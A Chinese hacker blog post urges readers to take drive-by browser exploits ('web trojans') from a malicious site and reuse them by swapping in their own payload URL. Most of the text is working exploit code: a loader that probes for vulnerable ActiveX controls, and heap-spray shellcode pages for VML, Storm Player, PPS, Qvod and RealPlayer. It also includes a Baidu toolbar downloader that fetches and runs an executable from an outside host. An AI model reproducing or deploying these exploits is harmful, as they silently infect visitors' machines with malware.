从此不在为网马发愁!

友情提醒：打开别人的毒网，最好是在虚拟机或者肉鸡上面研究，以免你自己的机器中马了！
前言: 如今有很多人, 总是想着去买马. 花大几百,或者几千. 去买个破马. 其实, 现在挂马地址又多.

根本不需要买的. 随便逛个毒网. OK. 什么网马都有了. 像下面这个地址. 挂的太全了.

什么东西都有了. 你说,你还买个什么. 直接一解密, 把EXE 加密地址换成自己的就可以用了.

为什么要去买呢? 那个REALONE 的有解密工具. 但解后, 不知如何再还原. 其它的马.都是可以偷过用

的.如果,一定要用REALONE 马的话, 我以前的BLOG 中有的. 有个REALONE 马. 想用可以直接拿去!

主站地址: http://ddz.yu52323.cn/index.htm

打开后, 实用网址查询, 现在很多恶意网站, 或者, 租服务器挂毒的, 都是用网址查询. 这种最简单..

打开该网页后. 会先打开http://ddz.yu52323.cn/css.htm页面. 来加载调用网马地址.

该页面解密后:

<script>window.onerror=function(){return true;}</script>
<Script Language="JavaScript">
var cook = "silentwm";

function setCookie(name, value, expire)
{ 
  window.document.cookie = name + "=" + escape(value) + ((expire == null) ? "" : ("; expires=" +

expire.toGMTString()));
}

function getCookie(Name)
{ 
  var search = Name + "=";
  if (window.document.cookie.length > 0)
  {
    offset = window.document.cookie.indexOf(search);
    if (offset != -1)
    {
    offset += search.length;     
    end = window.document.cookie.indexOf(";", offset)     
    if (end == -1)
      end = window.document.cookie.length;
    return unescape(window.document.cookie.substring(offset, end));
    }
  }
  return null;
}

function register(name)
{
  var today = new Date();
  var expires = new Date();
  expires.setTime(today.getTime() + 1000*60*60*24);
  setCookie(cook, name, expires);
}

function openWM()
{
  var c = getCookie(cook);
  if (c != null)
  {
  return;
  }
 
  register(cook);
 
  window.defaultStatus="完成";
 
  try{ var e;
    var ado=(document.createElement("object"));
    ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
    var as=ado.createobject("Adodb.Stream","")}
  catch(e){};
  finally{
    if(e!="[object Error]"){
    document.write("<iframe width=50 height=0 src=../imgs/14.htm></iframe>")}
    else
    {
    try{ var j;
      var real11=new ActiveXObject("IERP"+"Ctl.I"+"ERPCtl.1");}
    catch(j){};
    finally{if(j!="[object Error]"){
      document.write('<iframe width=10 height=0 src=../imgs/new.htm></iframe>')}}

    try{ var g;
      var glworld=new ActiveXObject("GLCHAT.GLChatCtrl.1");}
    catch(g){};
    finally{if(g!="[object Error]"){
      document.write('<iframe style=display:none src=../imgs/lz.htm></iframe>')}}
   
    try{ var h;
      var storm=new ActiveXObject("MPS.StormPlayer.1");}
    catch(h){};
    finally{if(h!="[object Error]"){
      document.write('<iframe style=display:none src=../imgs/bf.htm></iframe>')}}

    try{ var p;
      var qvod=new ActiveXObject("QvodInsert.QvodCtrl.1");}
    catch(p){};
    finally{if(p!="[object Error]"){
      document.write('<iframe width=10 height=0 src=../imgs/qq.htm></iframe>')}}

    try{ var f;
      var thunder=new ActiveXObject("DPClient.Vod");}
    catch(f){};
    finally{ if(f!="[object Error]"){
      document.write('<iframe width=50 height=0 src=../imgs/xl.htm></iframe>')}}
                              try{ var c;
                                        var Baidu=new ActiveXObject("BaiduBar.Tool.1");}
          catch(c){};
    finally{ if(c!="[object Error]"){
      document.write('<iframe width=50 height=0 src=../imgs/Baidu.htm></iframe>')}}
                              try{ var m;
                                        var Real10=new ActiveXObject("IERPCtl.IERPCtl.1");}
          catch(m){};
    finally{ if(m!="[object Error]"){
      document.write('<iframe width=50 height=0 src=../imgs/rl.htm></iframe>')}}
                               

    document.write('<iframe style=display:none src=../imgs/04.htm></iframe>')

    if(f=="[object Error]" && g=="[object Error]" && h=="[object Error]" && i=="[object Error]" && j=="[object Error]" && p=="[object Error]" && c=="[object Error]" && m=="[object Error]")
    {location.replace("about:blank");}
    }}
}

openWM();
</script>

挂的东西, 还是满齐全的. 世面上有的马, 他这里全有了. 想偷马的. 就趁现在哈!!

http://ddz.yu52323.cn/imgs/04.htm
http://ddz.yu52323.cn//imgs/Baidu.htm
http://ddz.yu52323.cn//imgs/bf.htm
http://ddz.yu52323.cn//imgs/lz.htm
http://ddz.yu52323.cn//imgs/new.htm
http://ddz.yu52323.cn//imgs/qq.htm
http://ddz.yu52323.cn//imgs/rl.htm
http://ddz.yu52323.cn//imgs/xl.htm
http://ddz.yu52323.cn//imgs/14.htm

先看看04.HTM 吧! 这个是07004 漏洞马! 想要的可以直接拿去!

<html xmlns:v="urn:schemas-microsoft-com:vml">
<head>
<object id="Silent" classid="CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E">
</object>
<style>
v\:*{behavior:url(#Silent);}
</style>
<SCRIPT language="javascript">
var shellcode;
var x74s0= "%u7468%u7074%u2f3a%u682f%u6861%u6b2e%u6964%u3332%u632e%u2f6e%u7075%u6170%u2e6f%u7865%u0065";
</script>
<script>
shellcode = "%u9090%u9090"+
"%u9090"+"%u6090%u17eb%u645e%u30a1"+"%u0000%u0500%u0800%u0000%uf88b"+"%u00b9"+
"%u0004"+"%uf300%uffa4%ue8e0%uffe4"+"%uffff%ua164%u0030%u0000%u408b"+"%u8b0c"+
"%u1c70"+"%u8bad%u0870%uec81%u0200"+"%u0000%uec8b%ue8bb%u020f%u8b00"+"%u8503"+
"%u0fc0"+"%ubb85%u0000%uff00%ue903"+"%u0221%u0000%u895b%u205d%u6856"+"%ufe98"+
"%u0e8a"+"%ub1e8%u0000%u8900%u0c45"+"%u6856%u4e8e%uec0e%ua3e8%u0000"+"%u8900"+
"%u0445"+"%u6856%u79c1%ub8e5%u95e8"+"%u0000%u8900%u1c45%u6856%uc61b"+"%u7946"+
"%u87e8"+"%u0000%u8900%u1045%u6856"+"%ufcaa%u7c0d%u79e8%u0000%u8900"+"%u0845"+
"%u6856"+"%u84e7%ub469%u6be8%u0000"+"%u8900%u1445%ue0bb%u020f%u8900"+"%u3303"+
"%uc7f6"+"%u2845%u5255%u4d4c%u45c7"+"%u4f2c%u004e%u8d00%u285d%uff53"+"%u0455"+
"%u6850"+"%u1a36%u702f%u3fe8%u0000"+"%u8900%u2445%u7f6a%u5d8d%u5328"+"%u55ff"+
"%uc71c"+"%u0544%u5c28%u652e%uc778"+"%u0544%u652c%u0000%u5600%u8d56"+"%u287d"+
"%uff57"+"%u2075%uff56%u2455%u5756"+"%u55ff%ue80c%u0062%u0000%uc481"+"%u0200"+
"%u0000"+"%u3361%uc2c0%u0004%u8b55"+"%u51ec%u8b53%u087d%u5d8b%u560c"+"%u738b"+
"%u8b3c"+"%u1e74%u0378%u56f3%u768b"+"%u0320%u33f3%u49c9%uad41%uc303"+"%u3356"+
"%u0ff6"+"%u10be%uf23a%u0874%ucec1"+"%u030d%u40f2%uf1eb%ufe3b%u755e"+"%u5ae5"+
"%ueb8b"+"%u5a8b%u0324%u66dd%u0c8b"+"%u8b4b%u1c5a%udd03%u048b%u038b"+"%u5ec5"+
"%u595b"+"%uc25d%u0008%u92e9%u0000"+"%u5e00%u80bf%u020c%ub900%u0100"+"%u0000"+
"%ua4f3"+"%uec81%u0100%u0000%ufc8b"+"%uc783%uc710%u6e07%u6474%uc76c"+"%u0447"+
"%u006c"+"%u0000%uff57%u0455%u4589"+"%uc724%u5207%u6c74%uc741%u0447"+"%u6c6c"+
"%u636f"+"%u47c7%u6108%u6574%uc748"+"%u0c47%u6165%u0070%u5057%u55ff"+"%u8b08"+
"%ub8f0"+"%u0fe4%u0002%u3089%u07c7"+"%u736d%u6376%u47c7%u7204%u0074"+"%u5700"+
"%u55ff"+"%u8b04%u3c48%u8c8b%u8008"+"%u0000%u3900%u0834%u0474%uf9e2"+"%u12eb"+
"%u348d"+"%u5508%u406a%u046a%uff56"+"%u1055%u06c7%u0c80%u0002%uc481"+"%u0100"+
"%u0000"+"%ue8c3%uff69%uffff%u048b"+"%u5324%u5251%u5756%uecb9%u020f"+"%u8b00"+
"%u8519"+"%u75db%u3350%u33c9%u83db"+"%u06e8%ub70f%u8118%ufffb%u0015"+"%u7500"+
"%u833e"+"%u06e8%ub70f%u8118%ufffb"+"%u0035%u7500%u8330%u02e8%ub70f"+"%u8318"+
"%u6afb"+"%u2575%uc083%u8b04%ub830"+"%u0fe0%u0002%u0068%u0000%u6801"+"%u1000"+
"%u0000"+"%u006a%u10ff%u0689%u4489"+"%u1824%uecb9%u020f%uff00%u5f01"+"%u5a5e"+
"%u5b59"+"%ue4b8%u020f%uff00%ue820"+"%ufdda%uffff"+x74s0;

var sh=unescape(shellcode);

sz=sh.length*2;
npsz=0x1000000-(sz+0x38);
nps=unescape("%u0c0c%u0c0c");
while(nps.length*2*1<npsz)
nps+=nps;
ihbc=(0x09000000-0x1000000)/0x1000000;
Silent_arry=new Array();
for(x=0;x<ihbc;x++)
{
Silent_arry[x]=nps+sh;
}
</script>
</head>
<BODY onload=window.status="">
<v:rect style="width:0pt;height:0pt" fillcolor="white" >
<v:recolorinfo recolorstate="t" numcolors="97612895">
<v:recolorinfoentry forecolor="rgb(1,0,66)" tocolor="rgb(1,0,66)"
recolortype="3084" lbcolor="rgb(1,0,66)" backcolor="rgb(1,0,66)"
fromcolor="rgb(1,0,66)" lbstyle ="3084" bitmaptype="3084" />
<v:recolorinfoentry forecolor="rgb(1,0,66)" tocolor="rgb(1,0,66)"
recolortype="3084" lbcolor="rgb(1,0,66)" backcolor="rgb(1,0,66)"
fromcolor="rgb(1,0,66)" lbstyle ="3084" bitmaptype="3084" />
<v:recolorinfoentry forecolor="rgb(1,0,66)" tocolor="rgb(1,0,66)"
recolortype="3084" lbcolor="rgb(1,0,66)" backcolor="rgb(1,0,66)"
fromcolor="rgb(1,0,66)" lbstyle ="3084" bitmaptype="3084" />
<v/recolorinfo>
</body>
</html>

baidu.htm

<script>window.onerror=function(){return true;}</script><OBJECT ID = "com" style='display:none' CLASSID = "clsid:{A7F05EE4-0426ID:-454F-8013-C41E3596E9E9}"></OBJECT><script>dddddddassadddddddddddddfdsfsf = "ddddsadadsddasfdsdddddddfasdfasfasf";com["DloadDS"]("http://hah.kdi23.cn/Baidu.cab", "Baidu.exe", 0);</script>

BF.htm

<html>
<object classid="clsid:6BE52E1D-E586-474f-A6E2-1A85A9B4D9FB" id='Silent'></object>
<body>
<script>
var bf0 = "%u7468%u7074%u2f3a%u682f%u6861%u6b2e%u6964%u3332%u632e%u2f6e%u7075%u6170%u2e6f%u7865%u0065";
var bf1 = "%u9090%u9090";

var shellcode = unescape("%u9090%u9090%uEFE9%u0000%u5A00%uA164%u0030%u0000%u408B%u8B0C%u1C70%u8BAD%u0840%uD88B%u738B%u8B3C%u1E74%u0378%u8BF3%u207E%uFB03%u4E8B%u3314%u56ED%u5157%u3F8B%uFB03%uF28B%u0E6A%uF359%u74A6%u5908%u835F%u04C7%uE245%u59E9%u5E5F%uCD8B%u468B%u0324%uD1C3%u03E1%u33C1%u66C9%u088B%u468B%u031C%uC1C3%u02E1%uC103%u008B%uC303%uFA8B%uF78B%uC683%u8B0E%u6AD0%u5904%u6AE8%u0000%u8300%u0DC6%u5652%u57FF%u5AFC%uD88B%u016A%uE859%u0057%u0000%uC683%u5613%u8046%u803E%uFA75%u3680%u5E80%uEC83%u8B40%uC7DC%u6303%u646D%u4320%u4343%u6643%u03C7%u632F%u4343%u03C6%u4320%u206A%uFF53%uEC57%u04C7%u5C03%u2E61%uC765%u0344%u7804%u0065%u3300%u50C0%u5350%u5056%u57FF%u8BFC%u6ADC%u5300%u57FF%u68F0%u2451%u0040%uFF58%u33D0%uACC0%uC085%uF975%u5251%u5356%uD2FF%u595A%uE2AB%u33EE%uC3C0%u0CE8%uFFFF%u47FF%u7465%u7250%u636F%u6441%u7264%u7365%u0073%u6547%u5374%u7379%u6574%u446D%u7269%u6365%u6F74%u7972%u0041%u6957%u456E%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u4C00%u616F%u4C64%u6269%u6172%u7972%u0041%u7275%u6D6C%u6E6F%u5500%u4C52%u6F44%u6E77%u6F6C%u6461%u6F54%u6946%u656C%u0041" + bf0);
</script>
<SCRIPT language="javascript">
var bigblock = unescape(bf1);
var headersize = 20;
var slackspace = headersize+0+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<300; x++) memory[x] = block + shellcode;
var buffer = '';
while (buffer.length < 4057) buffer+='\x0a\x0a\x0a\x0a';
buffer+='\x0a';
buffer+='\x0a';
buffer+='\x0a';
buffer+='\x0a\x0a\x0a\x0a';
buffer+='\x0a\x0a\x0a\x0a';
var Silent1 = Silent;
Silent1.rawParse(buffer);
</script>
</body>
</html>

LZ.htm

<html>
<body>
<title>Silent</title>
<SCRIPT language="javascript">
var pps="clsid:61F5C358-60FB-4A23";
var pplive="-A312-D2B556620F20";
var baofeng=pps+pplive;
paopaopao=document.createElement("object");
paopaopao["setAttribute"]("classid", baofeng);
</script>
<SCRIPT language="javascript">
var pao7="%u87e8%u0000%u8900%u1045%u6856%ufcaa%u7c0d%u79e8%u0000%u8900%u0845";
var pao25="%u8519%u75db%u3350%u33c9%u83db%u06e8%ub70f%u8118%ufffb%u0015%u7500";
var url="%u7468%u7074%u2f3a%u682f%u6861%u6b2e%u6964%u3332%u632e%u2f6e%u7075%u6170%u2e6f%u7865%u0065";
var pao10="%u6850%u1a36%u702f%u3fe8%u0000%u8900%u2445%u7f6a%u5d8d%u5328%u55ff";
var pao28="%u0000%u006a%u10ff%u0689%u4489%u1824%uecb9%u020f%uff00%u5f01%u5a5e";
var pao4="%u0fc0%ubb85%u0000%uff00%ue903%u0221%u0000%u895b%u205d%u6856%ufe98";
var pao21="%ub8f0%u0fe4%u0002%u3089%u07c7%u736d%u6376%u47c7%u7204%u0074%u5700";
var pao29="%u5b59%ue4b8%u020f%uff00%ue820%ufdda%uffff";
var pao17="%u595b%uc25d%u0008%u92e9%u0000%u5e00%u80bf%u020c%ub900%u0100%u0000";
var pao1="%u9090%u6090%u17eb%u645e%u30a1%u0000%u0500%u0800%u0000%uf88b%u00b9";
var pao13="%u0000%u3361%uc2c0%u0004%u8b55%u51ec%u8b53%u087d%u5d8b%u560c%u738b";
</script>
<SCRIPT language="javascript">
var pao2="%u0004%uf300%uffa4%ue8e0%uffe4%uffff%ua164%u0030%u0000%u408b%u8b0c";
var pao3="%u1c70%u8bad%u0870%uec81%u0200%u0000%uec8b%ue8bb%u020f%u8b00%u8503";
var pao5="%u0e8a%ub1e8%u0000%u8900%u0c45%u6856%u4e8e%uec0e%ua3e8%u0000%u8900";
var pao6="%u0445%u6856%u79c1%ub8e5%u95e8%u0000%u8900%u1c45%u6856%uc61b%u7946";
var pao8="%u6856%u84e7%ub469%u6be8%u0000%u8900%u1445%ue0bb%u020f%u8900%u3303";
var pao9="%uc7f6%u2845%u5255%u4d4c%u45c7%u4f2c%u004e%u8d00%u285d%uff53%u0455";
var pao11="%uc71c%u0544%u5c28%u652e%uc778%u0544%u652c%u0000%u5600%u8d56%u287d";
var pao12="%uff57%u2075%uff56%u2455%u5756%u55ff%ue80c%u0062%u0000%uc481%u0200";
var pao14="%u8b3c%u1e74%u0378%u56f3%u768b%u0320%u33f3%u49c9%uad41%uc303%u3356";
var pao15="%u0ff6%u10be%uf23a%u0874%ucec1%u030d%u40f2%uf1eb%ufe3b%u755e%u5ae5";
var pao16="%ueb8b%u5a8b%u0324%u66dd%u0c8b%u8b4b%u1c5a%udd03%u048b%u038b%u5ec5";
var pao18="%ua4f3%uec81%u0100%u0000%ufc8b%uc783%uc710%u6e07%u6474%uc76c%u0447";
var pao19="%u006c%u0000%uff57%u0455%u4589%uc724%u5207%u6c74%uc741%u0447%u6c6c";
var pao20="%u636f%u47c7%u6108%u6574%uc748%u0c47%u6165%u0070%u5057%u55ff%u8b08";
var pao22="%u55ff%u8b04%u3c48%u8c8b%u8008%u0000%u3900%u0834%u0474%uf9e2%u12eb";
var pao23="%u348d%u5508%u406a%u046a%uff56%u1055%u06c7%u0c80%u0002%uc481%u0100";
var pao24="%u0000%ue8c3%uff69%uffff%u048b%u5324%u5251%u5756%uecb9%u020f%u8b00";
var pao26="%u833e%u06e8%ub70f%u8118%ufffb%u0035%u7500%u8330%u02e8%ub70f%u8318";
var pao27="%u6afb%u2575%uc083%u8b04%ub830%u0fe0%u0002%u0068%u0000%u6801%u1000";
var paopao1=pao1+pao2+pao3+pao4+pao5+pao6+pao7+pao8+pao9+pao10+pao11+pao12+pao13;
var paopao2=pao14+pao15+pao16+pao17+pao18+pao19+pao20+pao21+pao22+pao23+pao24;
var paopao3="%u9090%u9090"+paopao1+paopao2+pao25+pao26+pao27+pao28+pao29;
</script>
<script language="JavaScript">
var webshell = window["unescape"](paopao3+url);
var bigblock = unescape("%u90"+"90"+"%u90"+"90");
var headersize = 20;
var slackspace = headersize+webshell.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock["substring"](0, bigblock["length"]-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
var chilam_user;
pps = new Array();
var pplive=pps;
for (x=0; x<300; x++) pplive[x] = block + webshell;
var buffer = '';
while (buffer["length"] < 1319) buffer+="A";
buffer=buffer+"\x0a\x0a\x0a\x0a"+buffer;
paopaopao["hgs_startNotify"](buffer);
</script>
</body>
</html>

new.htm  这个是REALONE 的!

<html><body>
<object classid="clsid:2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93" id="Silent"></object>
<script>
var shellcode;
var real110 = "%u7468%u7074%u2f3a%u682f%u6861%u6b2e%u6964%u3332%u632e%u2f6e%u7075%u6170%u2e6f%u7865%u0065";
var real111 = "%u9090%u9090";
var real112 = "%u0C0C%u0C0C";
</script><script>
shellcode = "";
shellcode = real111+
"%u9090"+"%u6090%u17eb%u645e%u30a1"+"%u0000%u0500%u0800%u0000%uf88b"+"%u00b9"+
"%u0004"+"%uf300%uffa4%ue8e0%uffe4"+"%uffff%ua164%u0030%u0000%u408b"+"%u8b0c"+
"%u1c70"+"%u8bad%u0870%uec81%u0200"+"%u0000%uec8b%ue8bb%u020f%u8b00"+"%u8503"+
"%u0fc0"+"%ubb85%u0000%uff00%ue903"+"%u0221%u0000%u895b%u205d%u6856"+"%ufe98"+
"%u0e8a"+"%ub1e8%u0000%u8900%u0c45"+"%u6856%u4e8e%uec0e%ua3e8%u0000"+"%u8900"+
"%u0445"+"%u6856%u79c1%ub8e5%u95e8"+"%u0000%u8900%u1c45%u6856%uc61b"+"%u7946"+
"%u87e8"+"%u0000%u8900%u1045%u6856"+"%ufcaa%u7c0d%u79e8%u0000%u8900"+"%u0845"+
"%u6856"+"%u84e7%ub469%u6be8%u0000"+"%u8900%u1445%ue0bb%u020f%u8900"+"%u3303"+
"%uc7f6"+"%u2845%u5255%u4d4c%u45c7"+"%u4f2c%u004e%u8d00%u285d%uff53"+"%u0455"+
"%u6850"+"%u1a36%u702f%u3fe8%u0000"+"%u8900%u2445%u7f6a%u5d8d%u5328"+"%u55ff"+
"%uc71c"+"%u0544%u5c28%u652e%uc778"+"%u0544%u652c%u0000%u5600%u8d56"+"%u287d"+
"%uff57"+"%u2075%uff56%u2455%u5756"+"%u55ff%ue80c%u0062%u0000%uc481"+"%u0200"+
"%u0000"+"%u3361%uc2c0%u0004%u8b55"+"%u51ec%u8b53%u087d%u5d8b%u560c"+"%u738b"+
"%u8b3c"+"%u1e74%u0378%u56f3%u768b"+"%u0320%u33f3%u49c9%uad41%uc303"+"%u3356"+
"%u0ff6"+"%u10be%uf23a%u0874%ucec1"+"%u030d%u40f2%uf1eb%ufe3b%u755e"+"%u5ae5"+
"%ueb8b"+"%u5a8b%u0324%u66dd%u0c8b"+"%u8b4b%u1c5a%udd03%u048b%u038b"+"%u5ec5"+
"%u595b"+"%uc25d%u0008%u92e9%u0000"+"%u5e00%u80bf%u020c%ub900%u0100"+"%u0000"+
"%ua4f3"+"%uec81%u0100%u0000%ufc8b"+"%uc783%uc710%u6e07%u6474%uc76c"+"%u0447"+
"%u006c"+"%u0000%uff57%u0455%u4589"+"%uc724%u5207%u6c74%uc741%u0447"+"%u6c6c"+
"%u636f"+"%u47c7%u6108%u6574%uc748"+"%u0c47%u6165%u0070%u5057%u55ff"+"%u8b08"+
"%ub8f0"+"%u0fe4%u0002%u3089%u07c7"+"%u736d%u6376%u47c7%u7204%u0074"+"%u5700"+
"%u55ff"+"%u8b04%u3c48%u8c8b%u8008"+"%u0000%u3900%u0834%u0474%uf9e2"+"%u12eb"+
"%u348d"+"%u5508%u406a%u046a%uff56"+"%u1055%u06c7%u0c80%u0002%uc481"+"%u0100"+
"%u0000"+"%ue8c3%uff69%uffff%u048b"+"%u5324%u5251%u5756%uecb9%u020f"+"%u8b00"+
"%u8519"+"%u75db%u3350%u33c9%u83db"+"%u06e8%ub70f%u8118%ufffb%u0015"+"%u7500"+
"%u833e"+"%u06e8%ub70f%u8118%ufffb"+"%u0035%u7500%u8330%u02e8%ub70f"+"%u8318"+
"%u6afb"+"%u2575%uc083%u8b04%ub830"+"%u0fe0%u0002%u0068%u0000%u6801"+"%u1000"+
"%u0000"+"%u006a%u10ff%u0689%u4489"+"%u1824%uecb9%u020f%uff00%u5f01"+"%u5a5e"+
"%u5b59"+"%ue4b8%u020f%uff00%ue820"+"%ufdda%uffff"+real110;

var shellcode1 = unescape(shellcode);

var bigblock = unescape(real112);
var headersize = 20;
var slackspace = headersize + shellcode1.length;
while (bigblock.length < slackspace) bigblock += bigblock;
var fillblock = bigblock.substring(0,slackspace);
var block = bigblock.substring(0,bigblock.length - slackspace);
while (block.length + slackspace < 0x40000) block = block + block + fillblock;
var memory = new Array();
for (i = 0; i < 400; i++){ memory = block + shellcode1 }
var buf = '';
while (buf.length < 32) buf = buf + unescape("%0C");
var m = '';
m = Silent.Console;
Silent.Console = buf;
Silent.Console = m;
m = Silent.Console;
Silent.Console = buf;
Silent.Console = m;
</script>
</body></html>

qq.htm      这个为qvod 播放器马

<HTML><BODY>
<object classid="clsid:F3D0D36F-23F8-4682-A195-74C92B03D4AF" name="Silent" width=100 height=200></object>

<script>
var qvod0 = "%u7468%u7074%u2f3a%u682f%u6861%u6b2e%u6964%u3332%u632e%u2f6e%u7075%u6170%u2e6f%u7865%u0065";
var qvod1 = "%u56f5%u768b";
</script>

<script>
var shellshell = "%u9090%u9090%u54eb%u758b%u8b3c%u3574%u0378" + qvod1 + "%u0320%u33f5%u49c9%uad41%udb33%u0f36%u14be%u3828%u74f2%uc108%u0dcb%uda03%ueb40%u3bef%u75df%u5ee7%u5e8b%u0324%u66dd%u0c8b%u8b4b%u1c5e%udd03%u048b%u038b%uc3c5%u7275%u6d6c%u6e6f%u642e%u6c6c%u4300%u5c3a%u2e55%u7865%u0065%uc033%u0364%u3040%u0c78%u408b%u8b0c%u1c70%u8bad%u0840%u09eb%u408b%u8d34%u7c40%u408b%u953c%u8ebf%u0e4e%ue8ec%uff84%uffff%uec83%u8304%u242c%uff3c%u95d0%ubf50%u1a36%u702f%u6fe8%uffff%u8bff%u2454%u8dfc%uba52%udb33%u5353%ueb52%u5324%ud0ff%ubf5d%ufe98%u0e8a%u53e8%uffff%u83ff%u04ec%u2c83%u6224" +"%ud0ff%u7ebf%ue2d8%ue873%uff40%uffff%uff52%ue8d0%uffd7%uffff" + qvod0 ;
</script>

<script>
var heapSprayToAddress = 0x05050505;
var shellcode = unescape(shellshell);
var heapBlockSize = 0x400000;
var payLoadSize = shellcode.length * 2;
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
var uun = "%u0505%u0505"
var spraySlide = unescape(uun);
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
memory = new Array();
for (i=0;i<heapBlocks;i++)
{
memory = spraySlide + shellcode;
}
try
{
var a=new Array(813);
var b=new Array(227);
a=a+"aaaa";
a=a+b+"a0 wa0 wa0 wa0 wa0 wa0 wa0 wa0 wjjjjjjjjjjjjjjjjjjN8 wvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvcccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccN";
a=a+"N8 wV8d JkIkBBs(ss&hsFFRECCvPAQdsezxCDDf%4ss#";

Silent.URL=a;
}
catch(e){}
function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2/1);
return spraySlide;
}
</script>
</BODY></HTML>

rl.htm    REALONE

<script>
var pao1="LLLL\\XXXXXLD";
var pao2=pao1;
var pao3="c:\\Program Files\\NetMeeti";
var pao4="ng\\..\\..\\WINDOWS\\Media\\chime";
var pao5="s.wav";
var pao6=pao3+pao4+pao5;
var pao7="c:\\Program Files\\Ne";
var pao8="tMeeting\\TestSn";
var pao9="d.wav";
var pao0=pao7+pao8+pao9;
var pps1="C:\\WINDOWS\\system32";
var pps2="\\BuzzingBee.wav";
var pps3=pps1+pps2;
var pps4="C:\\WINDOWS\\clock.avi";
var pps5="c:\\Program Files\\NetMeeting";
var pps6="\\..\\..\\WINDOWS\\Media\\tada.wav";
var pps7=pps5+pps6;
var pps8="C:\\WINDOWS\\syste";
var pps9="m32\\LoopyMusic.wav";
var pps0=pps8+pps9;
var sel1="IERPCtl.I";
var sel2="ERPCtl.1";
var sel3=sel1+sel2;
var x1="%75"+"%06"+"%74"+"%04";
var x2="%7f"+"%a5"+"%60";
var x3="%4f"+"%71"+"%a4"+"%60";
var x4="%63"+"%11"+"%08"+"%60";
var x5="%63"+"%11"+"%04"+"%60";
var x6="%79"+"%31"+"%01"+"%60";
var x7="%79"+"%31"+"%09"+"%60";
var x8="%51"+"%11"+"%70"+"%63";
var pplive=[x1,x2,x3,x4,x5,x6,x7,x8];
function RealExploit()
{
var user=navigator.userAgent["toLowerCase"]();

if(user.indexOf("msie 6")==-1&&user.indexOf("msie 7")==-1) return;
if(user.indexOf("nt 5.")==-1) return;

creobj=sel3;

try{ Realpao = new window["ActiveXObject"](creobj); }
catch(error){ return; }

RealVersion = Realpao.PlayerProperty("PRODUCTVERSION");

var reading="";
var tiaozhuan=unescape(pplive[0]);
var fanhui;

for(i=0;i<32*148;i++)
  reading+="S";

if(RealVersion.indexOf("6.0.14.")==-1)
{
  if(navigator.userLanguage.toLowerCase()=="zh-cn") fanhui=unescape(pplive[1]);
  else if(navigator.userLanguage.toLowerCase()=="en-us") fanhui=unescape(pplive[2]);
  else return;
}
else if(RealVersion=="6.0.14.544") fanhui=unescape(pplive[3]);
else if(RealVersion=="6.0.14.550") fanhui=unescape(pplive[4]);
else if(RealVersion=="6.0.14.552") fanhui=unescape(pplive[5]);
else if(RealVersion=="6.0.14.543") fanhui=unescape(pplive[6]);
else if(RealVersion=="6.0.14.536") fanhui=unescape(pplive[7]);
else return;

if(RealVersion.indexOf("6.0.10.")!=-1)
{
  for(i=0;i<4;i++)
    reading=reading+tiaozhuan;
    reading=reading+fanhui;
}
else if(RealVersion.indexOf("6.0.11.")!=-1)
{
  for(i=0;i<6;i++)
    reading=reading+tiaozhuan;
    reading=reading+fanhui;
}
else if(RealVersion.indexOf("6.0.12.")!=-1)
{
  for(i=0;i<9;i++)
    reading=reading+tiaozhuan;
    reading=reading+fanhui;
}
else if(RealVersion.indexOf("6.0.14.")!=-1)
{
  for(i=0;i<10;i++)
    reading=reading+tiaozhuan;
    reading=reading+fanhui;
}

var pplivecode="";
pplivecode=pplivecode+"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIxkR0qJPJP3YY0fNYwLEQk0p47zpf";
pplivecode=pplivecode+"KRKJJKVe9xJKYoIoYolOoCQv3VsVwLuRKwRvavbFQvJM";
pplivecode=pplivecode+"WVsZzMFv0z8K8mwVPnxmmn8mDUBzJMEBsHuN3ULUhmfx";
pplivecode=pplivecode+"W6peMMZM7XPrf5NkDpP107zMpYE5MMzMj44LqxGONuKp";
pplivecode=pplivecode+"TRrNWOVYM5mqqrwSMTnoeoty08JMnKJMgPw2pey5MgMW";
pplivecode=pplivecode+"QuMwrunOgp8mpn8m7PrZBEleoWng2DRELgZMU6REoUJM";
pplivecode=pplivecode+"mLHmz1KUOPCXHmLvflsRWOLNvVrFPfcVyumpRKp4dpJ9VQMJUlxmmnTL2GWOLNQKe6pfQvXeMpPuVPwP9v0XzFr3Ol9vRpzFDxm5NjqVxmLzdLSvTumI5alJMqqrauWJUWrhS3OQWRU5QrENVcE61vPUOVtvTv4uP0DvLYfQOjZMoJP6eeMIvQmF5fLYP1nrQEmvyZkSnFtSooFWTtTpp5oinTWLgOzmMTk8PUoVNENnW0J9mInyWQS3TRGFVt6iEUTgtBwrtTs3r5r5PfEqTCuBgEGoDUtR4CfkvB4OEDc3UUGbVib4Wo5we6VQVouXdcENeStEpfTc7nVoUBdrfnvts3c77r3VwZwyGw7rdj4OS4DTww6tuOUw2F4StTUZvkFiwxQvtsud7Z6BviR1gxUZ4IVgTBfRWygPfouZtCwWqvRHptd4RPFZVOdoSXQqsXTnRK3T2IWBwCTne3pnTo1eppt00aPoFNPeT8Quopwp";
realzh=reading+pao2+pplivecode;
temp=0x8000; while(realzh["length"] < temp) realzh+="hohoho";
var arr1=[pao6,pao0,pps3,pps4,pps7,pps0];
Realpao["import"](arr1[Math.floor(Math["random"]()*6)], realzh, "", 0, 0);
}
RealExploit();
</script>

xl.htm  迅雷马

